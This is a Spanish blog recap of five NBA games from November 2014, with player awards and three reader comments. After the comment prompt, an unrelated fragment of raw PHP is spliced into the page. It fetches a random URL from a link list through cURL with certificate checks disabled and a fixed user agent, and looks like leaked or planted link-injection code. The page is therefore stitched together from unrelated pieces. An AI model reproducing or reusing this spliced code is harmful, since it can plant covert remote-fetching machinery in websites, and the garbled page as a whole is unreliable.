La crónica: Noche de Big Threes

11 de November de 2014 por Sancho88

Jornada de grandes partidos la de anoche, que también nos ha dejado actuaciones individuales portentosas, pero por encima de todas ellas la sensación de que dos grandes proyectos empiezan a carburar: el de los Cavs, con un LeBron James desatado que consiguió el trigésimo octavo triple-doble de su carrera, y el de Chicago, con la sublimación del colectivo y la sensación de que tienen al base más especial de toda la liga en Derrick Rose, y la pareja interior más decisiva y con más química en ambos aros de la cancha; Pau Gasol y Joakim Noah. Fue la de anoche una noche de Big Threes, pero también una noche de grandes esfuerzos en vano, como el del dúo Davis-Anderson contra los Cavaliers o del gran Gordon Hayward en la cancha de los Pacers. Por lo demás, los Knicks perdieron su quinto partido consecutivo frente a los Hawks y los Spurs aterrizaron dos semanas después en la competición para volver a sacar los colores a unos Clippers que están decepcionando a propios y extraños. Comenzamos.

New Orleans Pelicans – Cleveland Cavaliers (111-118)

No hay nada como un toque de atención de vez en cuando del jefe para que la gente no se relaje. LeBron habló la semana pasada sobre la mentalidad perdedora del equipo, que no estaban acostumbrados a darlo todo en cada jugada, al ritmo que se le debe imponer al campeón. Y lo personalizó en los jóvenes Irving, Waiters, Thompson, etc. Ayer no estaba Waiters por lesión, pero Irving jugó al nivel que se le viene esperando desde principio de curso, y por supuesto LeBron y Love respondieron en consonancia. 86 puntos del Big Three de los Cavaliers, de un total de 118. Una actuación muy ‘Miamesca’. Los Cavs llevaban cuatro partidos fuera de casa y necesitaban darse un respiro. Lo consiguieron en la que fue la primera victoria en casa de la temporada. No obstante, no lo tuvieron fácil. En la primera mitad Ryan Anderson los acribilló a triples -un total de 5- para conseguir 23 puntos. Pero el equipo despertó en el tercer cuarto guiados por un Kyrie Irving desatado. 9 puntos consecutivos del base de origen australiano provocaron un terrible parcial de 1-16 a favor de los Cavs. A partir de ahí Love se unió a la fiesta con tres triples seguidos en un último cuarto para el recuerdo que reivindicó el poder del 3. Entre Irving, Love y LeBron anotaron 31 de los 33 puntos de su equipo en el último cuarto. Como dirían en ‘Poltergeist’ de Steven Spielberg, “Ya están aquí….”.

Detroit Pistons – Chicago Bulls (91-102)

Si la noche iba de ‘Big Threes’, curioso fue el enfrentamiento entre el trío de los Bulls y el de los Pistons. Derrick Rose volvió a las pistas 5 partidos después y lo hizo como solo lo puede hacer un MVP como él, dejándonos boquiabiertos con su calidad (24-7) y destapando todas las mentiras del juego de Brandon Jennings. En la zona triunfó el dúo Gasol-Noah. Pau fue el mejor del partido sin ninguna duda aportando en defensa y en ataque, jugando con mucha intensidad y volviendo loca a la caótica rotación interior de los Pistons. También ayudó el candidato a MIP Jimmy Butler. Está prácticamente imparable el tío. En las filas de SVG las cosas pintaron totalmente diferentes. Andre Drummond está pasando por un bache gordo en su carrera y ayer a punto estuvo de irse a casa con 0 puntos. 0 de 5 en tiros y menos mal que metió los dos tiros libres que tiró. Es normal que le suceda esto en una rotación interior tan incoherente como la de los Pistons. De inicio juegan los tres juntos, a veces dice Van Gundy que no van a coincidir en pista, pero entonces empieza a rotarlos cada 2 minutos quitando de la cancha al que mejor lo estaba haciendo… En fin, se monta unos líos él solo con la rotación que nos tiene locos a todos. Y claro, estas situaciones son un caldo de cultivo perfecto para que Josh Smith corte el cable rojo de su cabeza, desconecte su sistema y se tire un ‘mandarinazo’ de los suyos contra tabla perdiendo de 4 a falta de dos minutos. ¿Eso cómo se lo explicas a su mamá o a su esposa, o si los tuviera, a sus hijos? ¡Papá es un tira mandarinas! No chicos, veréis, papá piensa que tiene que hacerlo, no le quitéis la ilusión. Él es feliz así. Y los Pistons en su deriva ‘Dumarsiana’ con un hermoso 2-5 ganado a base de bien. Ellos son felices así. Después del ‘mandarinazo’ Butler metió un triple real y el partido quedó finiquitado.

San Antonio Spurs – Los Ángeles Clippers (89-85)

Hubiera sido muy raro ver un 2-4 en el parcial de estos Spurs, de nuestros Spurs. Precisamente cuando nadie piensa que esta temporada se vayan a jubilar. Ya les damos por inmortales. Ayer apareció la mejor versión del MVP de las pasadas finales Kawhi Leonard, que con un genial doble-doble (26-10) comandó la ofensiva texana. Duncan ayudó con sus números de siempre (18-11) en un partido raro, con porcentajes malísimos en ambos equipos comandados por sendos 1/7 en triples de Matt Bonner y Jamaal Crawford. Los Clippers mandaban por un holgado 82-75 a falta de 6 minutos pero entonces Blake Griffin, que había hecho un partidazo hasta el momento, empezó a perder balones en ataque y a fallar tiros al lado de canasta. Chris Paul tampoco fue capaz de mantener la ventaja y los Clippers cayeron una vez más contra su bestia negra de San Antonio. Por cierto, hablando de Big Threes… es la victoria 500 de Duncan, Ginobili y Parker. Los líderes en cuanto a victorias cosechadas por un trío es para Larry Bird, Kevin McHale y Robert Parish (540), a los que previsiblemente superarán esta misma temporada.

Atlanta Hawks – New York Knicks (91-85)

El triángulo de los Knicks se parece mucho a aquella metáfora de Vanderlei Luxemburgo cuando entrenaba al Madrid. Tiene ángulos mágicos y esquinas mágicas. Vamos, que no lo entiende ni siquiera el propio Fisher, ni Phil Jackson ni la madre que lo parió al triángulo. Si la esencia de ese sistema ofensivo es la fluidez en ataque y los tiros fáciles buscando el lado débil no se está ejecutando a ningún nivel (6 de 26 en triples ayer). A lo mejor la cosa se resuelve con la vuelta de Calderón y Bargnani, algo que dudamos, pero es el quinto tropiezo consecutivo de los Knicks. En los Hawks Korver ya es el vigésimo mejor triplista de la historia de la NBA al superar a Nick Van Exel con sus 17 puntos y 3 triples de ayer, bien comandados por la ayuda de Paul Millsap y Dennis Schroeder desde el banquillo. En los Knicks estuvieron muy solos Carmelo, Shumpert y Hardaway JR. Como dice Melo es muy frustrante ver la pintura de los Knicks. Dalembert ni miró a canasta anoche y Stoudemire solo metió 4 puntos. A los Hawks les bastó con su impecable 27 de 28 en tiros libres.

Utah Jazz – Indiana Pacers (86-97)

Para terminar los Pacers rompieron su desastrosa racha de 6 partidos consecutivos perdiendo ante los Jazz gracias a la reivindicación de Roy Hibbert, que sigue siendo el referente de unos Pacers desangelados. Pocos podíamos prever que este proyecto tuviera la mala pinta que tiene hoy en día, en gran parte propiciado por las lesiones. AJ Price ayudó muy bien desde el banquillo con 22 puntos y Lavoy Allen sumó también grandes números desde ahí (12-15). A los Pacers de Vogel les bastó con controlar las pérdidas y estar centrados en los tiros libres. Son esas claves que siempre se recalca su importancia pero que muchas veces no se pone demasiada atención en ellas. En los Jazz sigue de dulce Gordon Hayward, el principal ‘clutcher’ de esta temporada al que su nuevo contrato le ha sentado como un guante (30-8-5). Fue uno de los mayores esfuerzos en vano de la noche. Estuvo también bien el turco Enes Kanter con 18 puntos. La calidad de este chico es asombrosa y ha empezado muy bien la temporada, pero siempre le falta continuidad. Veremos si lo consigue.

Premios

MVP: Soñaban los aficionados de los Cavs antes del inicio de la temporada con algo como lo que hizo su Big Three anoche, 86 puntos, 22 rebotes y 21 asistencias, liderados por el descomunal triple doble de LeBron James. Lo de los Bulls casi habría que considerarlo un Big Four: 73 puntos, 35 rebotes y 18 asistencias sumaron Noah, Rose, Butler y un excelente Pau Gasol, quien añadió además 4 tapones. Y no estuvo nada mal lo que hizo Kawhi Leonard, con problemas de visión y todo, en pista de los Clippers: 26-10-3-3 y victoria para poner a los Spurs con un 50% de victorias.

Rookie: Fue una noche muy gris para los novatos, así que nos quedaremos con la contribución de Joe Harris, sólido en los 20 minutos de rotación que le dio a Blatt. Logró 5 puntos, 1 rebote y 1 asistencia, pero el dato que mejor atestigua su papel es el +18 que registraron los Cavs con él en pista.

Sorpresa: Sorprendentes y necesarias aportaciones en los Pacers por parte de Lavoy Allen (12 puntos, 15 rebotes, 3 asistencias) y el recién llegado AJ Price (22 puntos). Y atentos al nivel que está dando Dennis Schroder en los últimos partidos para los Hawks. Anoche, 14-4-4 y cada vez más cerca de dejar de ser una sorpresa.

Decepción: Por contra, el base titular de Atlanta protagonizó una actuación desastrosa: 0/4, 3 puntos, 6 asistencias y 3 pérdidas de Teague. Similares fueron los números de Andre Drummond: 0/5 en tiros, 2 tristes puntos, 12 rebotes, 1 tapón y 3 pérdidas.

Mayor esfuerzo en vano: The Brow sigue deslumbrando y haciendo números al alcance de poquísimos. 27 puntos, 14 rebotes, 4 asistencias, 4 robos y 3 tapones logró Anthony Davis en The Q. Le acompañó Ryan Anderson, autor de 8 triples y 32 puntos, 5 rebotes y 3 asistencias. Quizás más mérito aún, considerando que su equipo se quedó en 86 puntos, tenga la actuación de Gordon Hayward en Indiana, donde anotó 30 puntos con 11/15 en tiros, con 8 rebotes y 5 asistencias. El 25-9-7 de Melo y el 23-10-6 de Blake Griffin tampoco valieron frente a Hawks y Spurs respectivamente.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. jhc dice:
    #1

    el comienzo de temporada de Drummond es desastrozo… debería ser elaño de su consagración y solo hace dar pasos para atras

      Citar

  2. Nacho dice:
    #2

    Parece que Hayward está callando muchas bocas. La mía ya la había callado antes. ¿La tuya cuando Denise, jejej?
    Anoche mayor esfuerzo en vano (que siempre me ha parecido un premio trampa) pero la semana pasada ganó partidos,
    Yo la verdad es que estaba ilusionado con Drummond. En la fantasy del plus lo elegí por delante de Davis por eso de hacer algo diferente, pero la realidad es la realidad.
    Anoche empecé a ver a los Cav’s hasta que me dormí (sí, soy cobarde), y he flipado esta mañana. Porque es obvio que lo que vi indicaba que podían ganar, pero también que podían perder. Pero sobre todo me aburrieron. Mucho. Cierto que yo puedo estar entre los haters de LeBron (lo siento; me aburre, no me parece estético, reconozco que es el mejor, pero no me transmite) pero flipo con Irving y a ratos con Love y lo que vi fue un peñazo de campeonato. Baloncesto feo, previsible, sin sustancia… lo que me lleva a una reflexión. ¿Me pasa sólo a mí, o la temporada ha empezado coñacito? Y eso que no he visto a los Knicks. He disfrutado con minutos de los Wolves y de de Orlando, porque perderán partidos, pero juegan con desparpajo, y me gustó el Spurs-Mavs de apertura y eso que parecía de pretemporada. Los Blazzers contra Clippers (feos son de ver éstos, y eso que mimbres tienen para el espectáculo)
    Ufff, no sé. Soso soso.

      Citar

  3. Vader dice:
    #3

    @Nacho

    De lo más potable que he visto de momento los Blazers ayer contra Nuggets. Aldridge como siempre en plan mariscal, Lopez jugando cada vez mejor y Lillard jugando el rol de base muy sólido, dirigiendo al equipo y anotando por este orden. Uno de los equipos que más me ha gustado!! (Y su banquillo también va mejorando, que bien se ve a Kaman!!)

    Por cierto que decepción Brian Shaw, por lo menos de momento. Yo esperaba bastante de él como entrenador y Denver es que no juegan a nada, defienden muy mal y quizás no tienen equipo para ser uno de los grandes en el Oeste pero un papel más digno creo que si deberían hacer.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>